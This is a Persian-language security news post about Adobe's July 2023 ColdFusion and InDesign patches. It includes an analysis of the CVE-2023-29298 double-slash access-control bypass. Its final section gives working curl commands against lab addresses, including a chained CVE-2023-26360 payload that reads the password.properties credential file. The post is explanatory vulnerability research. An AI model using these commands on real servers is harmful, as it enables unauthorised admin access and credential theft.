Skip to content

ONHEXGROUP

اخبار دنیای امنیت سایبری

  • اخبار
    • آسیب پذیری امنیتی
    • آنالیز بدافزار
    • کنفرانس ،دوره ، وبینار ، لایو ، CTF
    • بازیگران تهدید
    • توسعه اکسپلویت
    • افشای اطلاعات
    • باگ بانتی
    • تیم آبی
    • تیم قرمز
    • امنیت وب
  • دوره های آموزشی
    • دوره رایگان مهندسی معکوس نرم افزار
  • لیست های ویژه
    • موتورهای جستجو برای امنیت سایبری
    • کاتالوگ KEV آژانس CISA
    • آسیب پذیری های وردپرس
      • آسیب پذیری پلاگین ها
      • آسیب پذیری های هسته
      • آسیب پذیری تم ها
    • محصولات خارج از پشتیبانی مایکروسافت
      • محصولات مایکروسافتی که در سال 2022 پشتیبانی نمیشن
      • محصولات مایکروسافتی که در سال 2023 پشتیبانی نمیشن
      • لیست محصولات مایکروسافتی که در سال 2024 پشتیبانی نمیشن
      • لیست محصولات مایکروسافتی که در سال 2025 پشتیبانی نمیشن
    • معرفی فیلم ها و سریالهای مرتبط با هک و امنیت
  • آموزش های ویدیویی
  • انتشارات
    • مجله
    • مقالات
    • پادکست
  • پروژه ها
    • ماشین آسیب پذیر
      • وردپرس آسیب پذیر
  • حمایت مالی ( Donate)
  • تماس با ما
 
  • Home
  • اخبار
  • اصلاح چندین آسیب پذیری در محصولات Adobe + آنالیز و اکسپلویت CVE-2023-29298
  • آسیب پذیری امنیتی
  • اخبار

اصلاح چندین آسیب پذیری در محصولات Adobe + آنالیز و اکسپلویت CVE-2023-29298

On تیر 26, 1402تیر 26, 1402
seyyid
Share
زمان مطالعه: 6 دقیقه

کمپانی Adobe در بولتن امنیتیش اعلام کرده که چندین آسیب پذیری رو در محصولات ColdFusion و InDesign خودش اصلاح کرده . در مجموع 16 آسیب پذیری در این محصولات اصلاح شدن که 4 موردش بحرانی بوده و در این پست بررسیشون میکنیم. در انتها هم آسیب پذیر CVE-2023-29298 رو بررسی و اکسپلویت و با اکسپلویت CVE-2023-26360 زنجیر کردیم.

 

آسیب پذیری CVE-2023-29308 :

آسیب پذیری از نوع Out-of-bounds Write و در محصول InDesign هستش و امکان اجرای کد دلخواه رو میده. شدت اون بحرانی و امتیاز 7.8 داره. برای اکسپلویت نیاز به تعامل کاربر هستش چون باید یه فایل مخرب رو باز کنه.

نسخه های تحت تاثیر :

 

Product

Affected version

Platform

Adobe InDesign

ID18.3 and earlier version

Windows and macOS 

Adobe InDesign

ID17.4.1 and earlier version                                        

Windows and macOS 

 

نسخه اصلاح شده :

 

Product

Updated version

Platform

Priority rating

Adobe InDesign

ID18.4

Windows and macOS

3

Adobe InDesign

ID17.4.2

Windows and macOS

3

 

آسیب پذیری CVE-2023-29300 :

آسیب پذیری از نوع Deserialization of Untrusted Data هستش و در محصول ColdFusion رخ میده. شدت بحرانی و امتیاز 9.8 داره. مهاجم امکان اجرای کد دلخواه رو داره. برای اکسپلویت نیاز به تعامل کاربر نیست. از این آسیب پذیری در حملاتی سوء استفاده شده . برای این آسیب پذیری تمپلیت Nuclei هم منتشر شده.

نسخه های تحت تاثیر :

 

Product

Update number

Platform

ColdFusion 2018

Update 16 and earlier versions    

All

ColdFusion 2021

Update 6 and earlier versions

All

ColdFusion 2023

GA Release (2023.0.0.330468)

All

 

نسخه های اصلاح شده :

 

Product

Updated Version

Platform

Priority rating

Availability

ColdFusion 2018

Update 17

All

1

Tech Note

ColdFusion 2021

Update 7

All

1

Tech Note

ColdFusion 2023

Update 1 

All

1

Tech Note

 

همچنین توصیه شده ، ColdFusion JDK/JRE رو به آخرین نسخه LTS برای JDK 17 ارتقاء بدن .

 

آسیب پذیری CVE-2023-38203 :

آسیب پذیری از نوع Deserialization of Untrusted Data هستش و در محصول ColdFusion رخ میده. شدت بحرانی و امتیاز 9.8 داره. مهاجم امکان اجرای کد دلخواه رو داره.

نسخه های تحت تاثیر:

 

Product

Update number

Platform

ColdFusion 2018

Update 17 and earlier versions    

All

ColdFusion 2021

Update 7 and earlier versions

All

ColdFusion 2023

Update 1 and earlier versions

All

 

نسخه های اصلاح شده :

 

Product

Updated Version

Platform

Priority rating

Availability

ColdFusion 2018

Update 18

All

1

Tech Note

ColdFusion 2021

Update 8

All

1

Tech Note

ColdFusion 2023

Update 2

All

1

Tech Note

 

همچنین توصیه شده ، ColdFusion JDK/JRE رو به آخرین نسخه LTS برای JDK 17 ارتقاء بدن .

 

آسیب پذیری CVE-2023-29298 :

آسیب پذیری از نوع Improper Access Control و در محصول ColdFusion رخ میده و امکان دور زدن ویژگی های امنیتی رو فراهم میکنه. شدت بحرانی و امتیاز 7.5 داره. برای اکسپلویت نیاز به تعامل کاربر نیست. مهاجم با اکسپلویت این آسیب پذیری میتونه به نقاط پایانی مدیریتی CFM و CFC در مسیر /CFIDE/ دسترسی داشته باشه. مثلا در ColdFusion 2021 Update 6 حدود 437 فایل CFM  و 96 فایل CFC در این مسیر وجود داره. البته دسترسی به این منابع به معنی استفاده از اونا توسط مهاجم نیست چون خیلی از این فایلها قبل از اجرا، وجود جلسه مجاز رو بررسی میکنن.اما در کل مهاجم میتونه با دسترسی به این منابع :

  • اگه اعتبارنامه معتبری داشته باشه میتونه وارد  ColdFusion Administrator بشه.
  • میتونه حمله بروت فروس روی این اعتبارنامه ها انجام بده.
  • میتونه اطلاعات حساس رو افشاء کنه.

برای آسیب پذیری تمپلیت Nuclei هم منتشر شده.

نسخه های تحت تاثیر :

 

Product

Update number

Platform

ColdFusion 2018

Update 16 and earlier versions    

All

ColdFusion 2021

Update 6 and earlier versions

All

ColdFusion 2023

GA Release (2023.0.0.330468)

All

 

نسخه های اصلاح شده :

 

Product

Updated Version

Platform

Priority rating

Availability

ColdFusion 2018

Update 17

All

1

Tech Note

ColdFusion 2021

Update 7

All

1

Tech Note

ColdFusion 2023

Update 1 

All

1

Tech Note

 

همچنین توصیه شده ، ColdFusion JDK/JRE رو به آخرین نسخه LTS برای JDK 17 ارتقاء بدن .

 

 

آنالیز آسیب پذیری CVE-2023-29298 :

Adobe ColdFusion یه پلتفرم توسعه هستش که از CFML برای ساخت سریع برنامه های وب مدرن استفاده میکنه.

آسیب پذیری در کل امکان دور زدن کنترل دسترسی رو به مهاجم میده. این ویژگی یه لیست مجاز از آدرس های IP خارجی رو ایجاد میکنه که مجاز به دسترسی به نقاط پایانی ColdFusion Administrator در وب سرور ColdFusion هستن. در نتیجه اگه درخواستی غیر از این لیست باشه، مسدود میشه. این کنترل دسترسی ، دسترسی به مسیرهای زیر رو محدود میکنه :

 

1
2
3
4
5
6
7
8
/restplay
/CFIDE/restplay
/CFIDE/administrator
/CFIDE/adminapi
/CFIDE/main
/CFIDE/componentutils
/CFIDE/wizards
/CFIDE/servermanager

 

چندین Java servlet ، کنترل دسترسی رو روی منابع در معرض دیدشون اعمال میکنن:

  • coldfusion.CfmServlet : که همه درخواستها به نقاط پایانی ColdFusion Module (CFM) رو مدیریت میکنه.
  • coldfusion.xml.rpc.CFCServlet : که همه درخواستها به نقاط پایانی ColdFusion Markup Language (CFML) و ColdFusion Component (CFC) رو مدیریت میکنه.
  • coldfusion.rds.RdsGlobals : که درخواستها به ویژگی Remote Development Service (RDS) رو مدیریت میکنه.

ویژگی کنترل دسترسی در کلاس coldfusion.filter.IPFilterUtils پیاده سازی شده و متد checkAdminAccess منطق کنترل دسترسی را مطابق شکل زیر پیاده سازی میکنه:

 

Java
1
2
3
4
5
6
7
8
9
10
11
12
13
14
public class IPFilterUtils {
private static final String[] PATHS = new String[] { "/restplay", "/cfide/restplay", "/cfide/administrator", "/cfide/adminapi", "/cfide/main", "/cfide/componentutils", "/cfide/wizards", "/cfide/servermanager" };
public static void checkAdminAccess(HttpServletRequest req) {
String uri = req.getRequestURI();
String uriToMatch = uri.substring(req.getContextPath().length()).toLowerCase();
for (String path : PATHS) {
if (uriToMatch.startsWith(path)) {
String ip = req.getRemoteAddr();
if (!isAllowedIP(ip))
throw new AdminAccessdeniedException(ServiceFactory.getSecurityService().getAllowedAdminIPList(), ip);
break;
}
}
}

 

در خط دوم کد بالا، مسیرهای حساس رو داریم. اگه درخواستی با این مسیرهای حساس شروع بشه، IP بررسی میشه ، اگه مجاز بود که هیچ اگه نه که یه استثناء ایجاد میشه که منجر به رد درخواست میشه.

با توجه به اینکه مسیرهای درخواستی توسط java.lang.String.startsWith بررسی میشن، میشه این فرایند رو با قرار دادن یه کاراکتر / اضافی دور زد. یعنی اگه شما مسیر "CFIDE/adminapi/" رو بخوای، با تغییر اون به "CFIDE/adminapi//" این ویژگی امنیتی رو دور میزنید.

 

اکسپلویت CVE-2023-29298 :

برای اکسپلویت میتونید از cURL استفاده کنیم. فقط یه نکته ای که هست اگه در لینوکس این دستورات رو اجرا میکنید بجای ^ از / استفاده کنید.

خب فرض کنید میخواییم متد wizardHash  رو در مسیر “CFIDE/wizards/common/utils.cfc/” رو فراخوانی کنیم :

 

1
curl -v -k http://172.23.10.174:8500/CFIDE/wizards/common/utils.cfc?method=wizardHash^&inPassword=foo

 

شکل زیر نشون میده که این درخواست به دلیل کنترل دسترسی اجرا نمیشه :

 

عدم اجرا به دلیل کنترل دسترسی

 

اما اگه دستور زیر رو با یه / اضافی ارسال کنیم :

 

1
c:\> curl -v -k http://172.23.10.174:8500//CFIDE/wizards/common/utils.cfc?method=wizardHash^&inPassword=foo

 

اکسپلویت cve-2023-29298

 

همونطور که مشاهده میکنید، کنترل دسترسی دور خورد.

اگه بخواییم به رابط مدیریتی ColdFusion Administrator از طریق یه مرورگر و یه IP خارجی غیرمجاز دسترسی داشته باشیم، خطای زیر رو میگیریم :

 

عدم دسترسی به رابط مدیریتی ColdFusion Administrator

 

اما اگه بازم اسلش رو دوبرابر کنیم ، میتونیم بهش دسترسی داشته باشیم. اینجا مهاجم اگه اعتبارنامه معتبری داشته باشه میتونه وارد بشه یا هم که حملات بروت فورس پیاده سازی کنه.

 

دسترسی به رابط مدیریت ColdFusion Administrator

 

زنجیره کردن آسیب پذیری CVE-2023-29298 :

یه نکته دیگه اینکه میشه این آسیب پذیری رو با آسیب پذیری های دیگه زنجیره کرد. مثلا میشه این آسیب پذیری رو با آسیب پذیری CVE-2023-26360 که امکان خوندن فایل دلخواه یا اجرای کد رو میده ترکیب کرد. برای اینکه مهاجم بتونه آسیب پذیری CVE-2023-26360 رو اکسپلویت کنه باید یه نقطه پایانی معتبر CFC روی تارگت درخواست کنه. خب همونطور که بالا مشاهده کردیم چنین نقاط پایانی در ColdFusion Administrator وجود داره. اکسپلویت CVE-2023-26360 برای خوندن فایل password.properties از طریق دستور زیر امکان پذیر هستش :

 

1
c:> curl -v -k http://172.26.181.162:8500/CFIDE/wizards/common/utils.cfc?method=wizardHash^&inPassword=foo^&_cfclient=true^&returnFormat=wddx -X POST -H "Content-Type: application/x-www-form-urlencoded" --data "_variables={\"about\":{\"_metadata\":{\"classname\":\"\\..\\lib\\password.properties\"},\"_variables\":{}}}"

 

اما اگه کنترل دسترسی رو داشته باشیم، درخواست بالا اجرا نمیشه :

 

عدم اجرای CVE-2023-26360

 

خب ما میتونیم با استفاده از CVE-2023-29298 کنترل دسترسی رو دور بزنیم و با CVE-2023-26360 اکسپلویت رو کامل کنیم. برای این منظور از دستور زیر استفاده میکنیم :

 

1
c:> curl -v -k http://172.26.181.162:8500//CFIDE/wizards/common/utils.cfc?method=wizardHash^&inPassword=foo^&_cfclient=true^&returnFormat=wddx -X POST -H "Content-Type: application/x-www-form-urlencoded" --data "_variables={\"about\":{\"_metadata\":{\"classname\":\"\\..\\lib\\password.properties\"},\"_variables\":{}}}"

 

خوندن پسورد adobe-coldfusion

 

همونطور که مشاهده میکنید ، به راحتی تونستیم محتویات فایل password.properties رو بخونیم.

 

منابع :

ADOBE

rapid7

 

 

اشتراک در شبکه های اجتماعی :

Facebook
Twitter
Pinterest
LinkedIn
In آسیب پذیری امنیتی اخبارIn Adobe , ColdFusion , CVE-2023-29298 , CVE-2023-29300 , CVE-2023-38203 , Deserialization of Untrusted Data , out-of-bounds write , آموزش اکسپلویت نویسی , اکسپلویت , اکسپلویت نویسی

راهبری نوشته

نگاهی به CVSS نسخه 4.0
نگاه هفتگی به حملات منتشر شده در دارک وب – 20 تا 26 تیر

دیدگاهتان را بنویسید لغو پاسخ

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

دسته‌ها

  • Osint
  • آسیب پذیری امنیتی
  • آموزش های ویدیویی
  • آنالیز بدافزار
  • اخبار
  • افشای اطلاعات
  • امنیت وب
  • انتشارات
  • اینترنت اشیاء
  • بازیگران تهدید
  • باگ بانتی
  • پادکست
  • پروژه ها
  • توسعه اکسپلویت
  • تیم آبی
  • تیم قرمز
  • دوره های آموزشی
  • فازینگ
  • کنفرانس ،دوره ، وبینار ، لایو ، CTF
  • لیست های ویژه
  • ماشین آسیب پذیر
  • مجله
  • مقالات
  • مهندسی معکوس نرم افزار

پست های مرتبط

  • آسیب پذیری امنیتی
  • اخبار
seyyid
On فروردین 10, 1404

آسیب پذیری IngressNightmare

  • آسیب پذیری امنیتی
  • اخبار
seyyid
On بهمن 8, 1401فروردین 28, 1402

اصلاح 6 آسیب پذیری در کروم

  • آسیب پذیری امنیتی
  • اخبار
  • بازیگران تهدید
  • توسعه اکسپلویت
  • مقالات
seyyid
On اردیبهشت 12, 1404

بررسی اکسپلویتهای زیرودی در سال 2024 از دید گوگل

  • آسیب پذیری امنیتی
  • اخبار
seyyid
On مهر 6, 1402مهر 7, 1402

حمله کانال جانبی جدید روی GPU ها

درباره ما

بعد از چندین سال فعالیت تو حوزه امنیت سایبری و تولید محتوا در شبکه های اجتماعی ، بالاخره تصمیم گرفتیم تا یه سایت راه اندازی کنیم و مطالب رو ساده تر ، در یک محیط منسجم و طبقه بندی شده به دست مخاطب برسونیم. امیدوارم که قدمی در راستای رشد امنیت سایبری کشورمون برداشته باشیم.

تگ ها

0day APT command injection Deserialization of Untrusted Data Directory Traversal FBI Fortinet Heap buffer overflow integer overflow kali LockBit Memory Corruption nuclei out-of-bounds write Out of bounds read Patch Tuesday PWN2OWN Stack Buffer overflow type confusion use after free vulnerable wordpress XSS ZDI vulnerability آموزش اکسپلویت نویسی ارز دیجیتال اندروید اپل اکسپلویت باج افزار تلگرام زیرودی سیسکو فارنزیک فورتی نت فیشینگ لاک بیت لینوکس مایکروسافت هوش مصنوعی وردپرس وردپرس آسیب پذیر ویندوز پلاگین کروم گوگل

شبکه های اجتماعی

    • Instagram
    • Telegram
    • Twitter
    • GitHub
    • YouTube
    • LinkedIn
      کپی مطالب با ذکر منبع بلامانع است | 1401-1404